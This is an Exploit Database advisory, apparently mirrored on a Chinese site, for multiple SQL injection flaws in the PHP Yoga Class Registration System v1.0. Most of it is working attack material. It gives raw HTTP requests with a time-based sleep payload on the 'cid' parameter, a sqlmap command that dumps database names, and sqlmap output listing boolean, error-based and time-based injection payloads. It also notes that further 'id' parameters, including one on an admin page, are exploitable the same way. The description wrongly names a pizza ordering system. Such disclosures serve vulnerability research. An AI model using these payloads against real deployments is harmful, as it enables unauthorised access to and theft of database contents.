Yoga Class Registration System v1.0 – Multiple SQLi

• Exploit Database
• 16 阅读

• 作者： Abdulhakim Öner
  日期： 2023-03-25
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51048/

• # Exploit Title: Yoga Class Registration System v1.0 - Multiple SQLi
  # Date: 19/03/2023
  # Exploit Author: Abdulhakim Öner
  # Vendor Homepage: https://www.sourcecodester.com
  # Software Link: https://www.sourcecodester.com/php/16097/yoga-class-registration-system-php-and-mysql-free-source-code.html
  # Software Download: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-ycrs.zip
  # Version: 1.0
  # Tested on: Windows, Linux
  
  ## Description 
  A Blind SQL injection vulnerability in the "cid" parameter in Online Pizza Ordering System allows remote unauthenticated attackers to dump database through arbitrary SQL commands. 
  
  ## Request PoC
  ```
  GET /php-ycrs/?p=yclasses%2fregistration&cid=2' HTTP/1.1
  Host: 192.168.1.101
  Accept-Encoding: gzip, deflate
  Accept: */*
  Accept-Language: en-US;q=0.9,en;q=0.8
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
  Connection: close
  Cache-Control: max-age=0
  Referer: http://192.168.1.101/php-ycrs/?p=yclasses%2fview_class&id=2
  Cookie: PHPSESSID=1pbq6ushdtnf0o5oqhdcv81l4v
  
  ```
  
  This request causes a Fatal Error in the webapp. Adding "'%2b(select*from(select(sleep(10)))a)%2b'" to the end of "cid" parameter, the response to request was 200 status code with message of OK, but 10 seconds later, which indicates that our sleep 10 command works. 
  
  ```
  GET /php-ycrs/?p=yclasses%2fregistration&cid=2'%2b(select*from(select(sleep(20)))a)%2b' HTTP/1.1
  Host: 192.168.1.101
  Accept-Encoding: gzip, deflate
  Accept: */*
  Accept-Language: en-US;q=0.9,en;q=0.8
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
  Connection: close
  Cache-Control: max-age=0
  Referer: http://192.168.1.101/php-ycrs/?p=yclasses%2fview_class&id=2
  Cookie: PHPSESSID=1pbq6ushdtnf0o5oqhdcv81l4v
  
  ```
  
  ## Exploit with sqlmap
  Save the request from burp to file 
  ```
  sqlmap -r sqli.txt -p 'cid' --batch --dbs --level=3 --risk=2
  
  ---snip---
  GET parameter 'cid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
  sqlmap identified the following injection point(s) with a total of 302 HTTP(s) requests:
  ---
  Parameter: cid (GET)
  Type: boolean-based blind
  Title: AND boolean-based blind - WHERE or HAVING clause
  Payload: p=yclasses/registration&cid=2' AND 5068=5068-- JfDq
  
  Type: error-based
  Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
  Payload: p=yclasses/registration&cid=2' AND (SELECT 3800 FROM(SELECT COUNT(*),CONCAT(0x717a7a6b71,(SELECT (ELT(3800=3800,1))),0x7170787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- hjLV
  
  Type: time-based blind
  Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
  Payload: p=yclasses/registration&cid=2' AND (SELECT 6005 FROM (SELECT(SLEEP(5)))kQyZ)-- btnY
  ---
  [16:00:10] [INFO] the back-end DBMS is MySQL
  web application technology: Apache 2.4.54, PHP 8.2.0
  ---snip---
  ```
  
  ## The "id" parameter in "/php-ycrs/?p=yclasses%2fview_class&id=1" and "/php-ycrs/admin/?page=classes%2fmanage_class&id=2" are also vulnerable. It can be exploited in the same way.